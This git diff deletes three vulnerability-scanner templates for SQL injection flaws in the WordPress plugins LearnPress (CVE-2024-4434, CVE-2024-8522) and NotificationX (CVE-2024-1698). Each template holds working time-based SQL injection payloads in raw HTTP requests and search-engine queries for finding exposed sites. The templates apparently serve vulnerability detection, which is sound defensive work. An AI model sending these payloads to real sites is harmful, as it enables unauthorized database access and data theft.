diff --git a/plugins/thimpress/learnpress/CVE-2024-4434.yaml b/plugins/thimpress/learnpress/CVE-2024-4434.yaml deleted file mode 100644 index 83f25ea90..000000000 --- a/plugins/thimpress/learnpress/CVE-2024-4434.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2024-4434 - -info: - name: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection - author: securityforeveryone - severity: critical - description: | - The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - remediation: Fixed in 4.2.6.6 - reference: - - https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd - - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection - - https://nvd.nist.gov/vuln/detail/CVE-2024-4434 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2024-4434 - epss-score: 0.00063 - epss-percentile: 0.2659 - cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:wordpress:*:*:* - metadata: - verified: true - max-request: 2 - publicwww-query: "/wp-content/plugins/learnpress" - product: learnpress - vendor: thimpress - tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress - -variables: - num: "{{rand_int(10000, 99999)}}" - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - @timeout 20s - POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1 - Host: {{Hostname}} - X-WP-Nonce: {{nonce}} - - - matchers: - - type: dsl - dsl: - - 'duration_2 >= 6' - - 'status_code_2 == 200' - - 'contains(content_type,"application/json")' - - 'contains_all(body_2,"No courses were found","success")' - condition: and - - extractors: - - type: regex - name: nonce - part: body - group: 1 - regex: - - '"nonce":"([a-z0-9]+)","is_course_archive"' - internal: true -# digest: 490a00463044022030832dc8c51ec8599db7592bfeb8e44857794db2ce4da73f9366344e9c8a7f0a02205dadd8a94f089791928931fcfa181c65020fb381f463619708823e58d2df33f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/thimpress/learnpress/CVE-2024-8522.yaml b/plugins/thimpress/learnpress/CVE-2024-8522.yaml deleted file mode 100644 index e1c1c6053..000000000 --- a/plugins/thimpress/learnpress/CVE-2024-8522.yaml +++ /dev/null @@ -1,69 +0,0 @@ -id: CVE-2024-8522 - -info: - name: LearnPress – WordPress LMS - SQL Injection - author: pdresearch,iamnoooob,rootxharsh - severity: critical - description: | - The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. - reference: - - https://github.com/advisories/GHSA-3w3r-r6g6-w8x5 - - https://nvd.nist.gov/vuln/detail/CVE-2024-8522 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2024-8522 - cwe-id: CWE-89 - epss-score: 0.04685 - epss-percentile: 0.91818 - cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 4 - vendor: thimpress - product: learnpress - shodan-query: html:"/wp-content/plugins/learnpress" - fofa-query: body="/wp-content/plugins/learnpress" - tags: cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated - -flow: http(1) && http(2) - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'contains(body, "/wp-content/plugins/learnpress")' - internal: true - - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - @timeout: 30s - GET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1 - Host: {{Hostname}} - - - | - @timeout: 30s - GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - matchers: - - type: dsl - name: time-based - dsl: - - 'duration_1>=6' - - 'duration_2>=6' -# digest: 4b0a00483046022100c0528b71426c3be73298ebbfa6c33b1436391baa48ccaf43552fd2b4b2f03de1022100c462164c7e94a36c7ea4a034ab7c697a17fc164e19418af6a015988d1a2c8ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/wpdeveloper/notificationx/CVE-2024-1698.yaml b/plugins/wpdeveloper/notificationx/CVE-2024-1698.yaml deleted file mode 100644 index 2db6a5063..000000000 --- a/plugins/wpdeveloper/notificationx/CVE-2024-1698.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2024-1698 - -info: - name: NotificationX <= 2.8.2 - SQL Injection - author: DhiyaneshDk - severity: critical - description: | - The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - reference: - - https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php - - https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php - - https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve - - https://github.com/fkie-cad/nvd-json-data-feeds - - https://nvd.nist.gov/vuln/detail/CVE-2024-1698 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2024-1698 - epss-score: 0.00045 - epss-percentile: 0.12615 - cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:wordpress:*:*:* - metadata: - verified: true - max-request: 1 - fofa-query: body="/wp-content/plugins/notificationx" - product: notificationx - vendor: wpdeveloper - tags: cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli - -http: - - raw: - - | - @timeout 10s - POST /wp-json/notificationx/v1/analytics HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"} - - matchers: - - type: dsl - dsl: - - 'duration>=5' - - 'status_code == 200' - - 'contains(body, "{\"success\":true}")' - - 'contains(header, "application/json")' - condition: and -# digest: 4a0a00473045022100dc0c2cee22d2614e1a3a15a7318e0f20fd4d87a1169cbc7196d2e41346a50a8c022027708781fc9ab4554ea6cb10af29ed73bf80a5394900b0d0dd7f20638496ca61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file